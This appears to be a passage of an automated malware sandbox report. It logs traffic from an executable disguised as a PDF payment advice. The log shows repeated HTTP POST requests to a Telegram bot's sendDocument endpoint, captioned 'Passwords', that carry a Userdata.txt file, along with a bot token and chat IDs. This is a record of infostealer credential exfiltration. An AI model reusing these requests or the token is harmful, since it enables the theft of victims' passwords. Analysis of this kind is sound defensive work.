                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:26 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 38 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13689,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421405,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.449784149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:28 UTC271OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1ef12d1812cc
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  2024-12-17 07:43:28 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 65 66 31 32 64 31 38 31 32 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1ef12d1812ccContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:29 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:29 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:29 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 30 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13690,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421409,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.449794149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:32 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1f1a00c07beb
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:32 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 31 61 30 30 63 30 37 62 65 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1f1a00c07bebContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:32 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:32 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:32 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 31 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13691,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421412,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.449805149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:35 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1f43f2bafc9c
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:35 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 34 33 66 32 62 61 66 63 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1f43f2bafc9cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:36 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:36 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:36 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 31 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13692,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421416,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  10192.168.2.449813149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:39 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1f6c4e620d42
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:39 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 36 63 34 65 36 32 30 64 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1f6c4e620d42Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:39 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:39 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:39 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 31 39 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13693,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421419,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  11192.168.2.449825149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:42 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1f946ce6ca9c
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:42 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 39 34 36 63 65 36 63 61 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1f946ce6ca9cContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:42 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:42 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:42 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13694,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421422,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  12192.168.2.449834149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:45 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1fbc5054d7f6
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:45 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 62 63 35 30 35 34 64 37 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1fbc5054d7f6Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                                                  2024-12-17 07:43:46 UTC388INHTTP/1.1 200 OK
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 17 Dec 2024 07:43:46 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 542
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-12-17 07:43:46 UTC542INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 34 32 31 34 32 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                                                  Data Ascii: {"ok":true,"result":{"message_id":13695,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1734421426,"document":{"file_n


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  13192.168.2.449844149.154.167.2204437788C:\Users\user\Desktop\PAYMENT ADVICE TT07180016-24_pdf.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-12-17 07:43:48 UTC295OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                                                  Content-Type: multipart/form-data; boundary================8dd1fe54a740e43
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Content-Length: 1090
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-12-17 07:43:48 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 31 66 65 35 34 61 37 34 30 65 34 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                  Data Ascii: --===============8dd1fe54a740e43Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
